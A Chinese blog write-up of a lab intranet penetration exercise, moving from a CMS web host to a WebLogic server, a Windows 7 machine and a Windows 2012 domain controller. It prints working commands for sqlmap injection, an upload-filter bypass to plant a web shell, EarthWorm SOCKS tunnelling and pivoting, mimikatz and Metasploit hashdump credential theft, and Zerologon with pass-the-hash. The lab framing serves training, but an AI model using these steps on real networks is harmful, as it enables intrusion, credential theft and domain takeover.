小型企业内网综合渗透靶场渗透思路

阅读量294590

|评论3

|

发布时间 : 2021-03-24 16:30:26

 

周末看公司内部实验室平台里新出了一个内网渗透的靶场,于是趁周末休息玩了一下。

 

靶场场景拓扑图:

需要先从mycms靶机开始往企业内部渗透,最终渗透到windows2012和win7这两台机器。

 

网络结构

本机IP:10.3.1.52
centos:网卡1:10.3.4.12 网卡2:192.168.2.10
windows_weblogic:网卡1:192168.2.100 网卡2:10.10.10.5
window7:10.10.10.15
window2012:10.10.10.10

 

1.centos靶机渗透

首先看centos靶机

很简洁的页面,四篇文章一个登入。猜测存在漏洞点在注入,上传,弱口令。

先随便注册了个账号 test123 登入发现有了个投稿功能

尝试编辑器上传文件无果,上传提示无写入权限。不过在文件空间里,可以看服务器全部文件

(这是个坑,掉进去就越陷越深)看到网站根目录下有一个sql文件

顺着思路就是-拿数据库文件-登管理员账号-上传文件-getshell

看到管理员账号和普通用户账号,不过加盐加密了。尝试弱口令爆破

账号user123密码user123 账号admin密码admin888

结果发现,管理员登入和普通用户没啥区别。难道这里要考sql注入?

直接上sqlmap

python sqlmap.py -u “http://10.3.4.12/index.php?action=view&mod=detail&id=4“ —batch

还是个dba权限

以为可以直接弹shell了,结果呵呵

以为要通过数据库插入shell。爆破数据库密码

又找到一处任意文件读取

事实证明这处漏洞也没啥用=-=

文件上传getshell

最后发现这里考的是文件上传绕过

在修改头像处可以上传文件

直接上传php文件提示文件名违法,猜测是黑名单限制。

尝试修改后缀为phtml后在上传,上传成功了。

右键图片查看图片路径

http://10.3.4.12/images/avatar/4.phtml

菜刀连接小马获取shell

网络和windows_weblogic靶机相通,权限只是apache的 不过边缘业务只是用作当跳板就不去提权了

配置通往192.168.2.*网段的代理环境

把ew上传到服务器上开代理就好了

chmod 777 ew_for_linux64 //给ew可执行权限
./ew_for_linux64 -s ssocksd -l 1034 //在本地开启1034端口进行代理

本地proxifier配置一下代理

添加10.3.4.12:1034

测试一下代理是否正常

配置一下代理规则,让192.168.2.*网段的走代理,其余的不走

此时就可以访问到192.168.2.*网段的资产了


2.wenlogic靶机渗透

知道目标靶机的IP地址为192.168.2.100

直接端口扫描

本以为要考weblogic,结果 就开了四个端口 显示存在ms17-010 直接上msf打

结果证明我想多了 又以为是端口弱口令爆破,结果也不行=-=

后来发现这道题的确是考weblogic ,只是服务器上没启动weblogic 手动上靶机上启动一下

此时可以访问到weblogic了

版本是10.3.6.0 有反序列直接工具打

看网段是和10.10.10.*段互通

此时可以准备打最后两台10网段的靶机了,老样子先建立代理通道

建立通往10.10.10.*的代理通道

利用远程桌面把ew和mimikatz文件上传到服务器上

在远程桌面种选择本地资源,然后勾选你本地磁盘,远程主机就会映射你的磁盘

利用mimikatz抓取本地密码

本地administrator的密码为tnudb4

利用ew建立代理

本地攻击机执行

ew_for_Win.exe -s rcsocks -l 58585 -e 19911

window-weblogic上执行

ew_for_Win.exe -s -sscoksd -19100

要以管理员身份执行cmd再运行此命令

Linux上执行

./ew_for_linux64 -s lcx_slave -d 10.3.1.52 -e 19911 -f 192.168.2.100 -g 19100

此时本地终端返回rssocks cmd_socket OK说明成功

在proxifier种新建一个127.0.0.1:58585的代理

让访问10.10.10.*网段的流量走新建的代理

测试一下

此时本地网络和10.10.10.*网段就通常了 可以开始渗透最后两台靶机了


3.利用ms17-010获取内网window7权限

依旧是先端口扫描

显示有ms17-010

不过本地打用 session总断,索性直接在weblogic的服务器上装了msf(还好这神器不用什么依赖环境)

抓取密码

run post/windows/gather/hashdump

解密

账号admin的密码为1qazcde3!@#

直接远程登录

查看一下网络环境

发现有域控

应该就是最后一台靶机了。最开始以为域控要考的是黄金令牌之类的 最后发现是cve-2020 – 1472


4.利用cve-2020 – 1472渗透内网window 2012域控

python3

impacket使用这个 https://github.com/SecureAuthCorp/impacket (下载后 sudo pip3 install .)

重置域内管理员密码poc https://github.com/dirkjanm/CVE-2020-1472

需要已知:域的名字,域控的计算机名,域控的IP地址

首先使用POC重置管理员密钥

python cve-2020-1472-exploit.py WIN-13L1MQMKNIO 10.10.10.10

查看密码hash

python secretsdump.py wings.com/WIN-13L1MQMKNIO$@10.10.10.10 -just-dc -no-pass

利用hash获取shell

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:6136ba14352c8a09405bb14912797793 wings.com/administrator@10.10.10.10

也可以利用抓取的hash解密后直接远程登入

账号:WINGS\administrator (前面要加域的名字)
密码:1qazcde3!@#

首次登入要修改密码

本文由墨竹星海原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/234809

安全客 - 有思想的安全新媒体

分享到:微信
+113赞
收藏
墨竹星海
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66